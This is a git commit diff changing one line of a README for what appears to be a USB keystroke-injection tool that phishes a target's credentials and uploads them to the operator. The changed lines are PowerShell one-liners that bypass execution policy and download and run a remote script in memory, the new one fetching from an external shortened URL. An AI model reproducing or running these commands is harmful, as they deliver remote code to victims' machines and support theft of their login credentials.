Update README.md
This commit is contained in:
parent
47deb6742c
commit
d4b06f5ca5
1 changed files with 1 additions and 1 deletions
|
@ -42,7 +42,7 @@ Once the target enters their credentials their information will be uploaded to y
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
powershell -noexit -ep bypass $db='';iwr https://jakoby.lol/35k | iex
|
||||||
```
|
```
|
||||||
|
|
||||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
Loading…
Reference in a new issue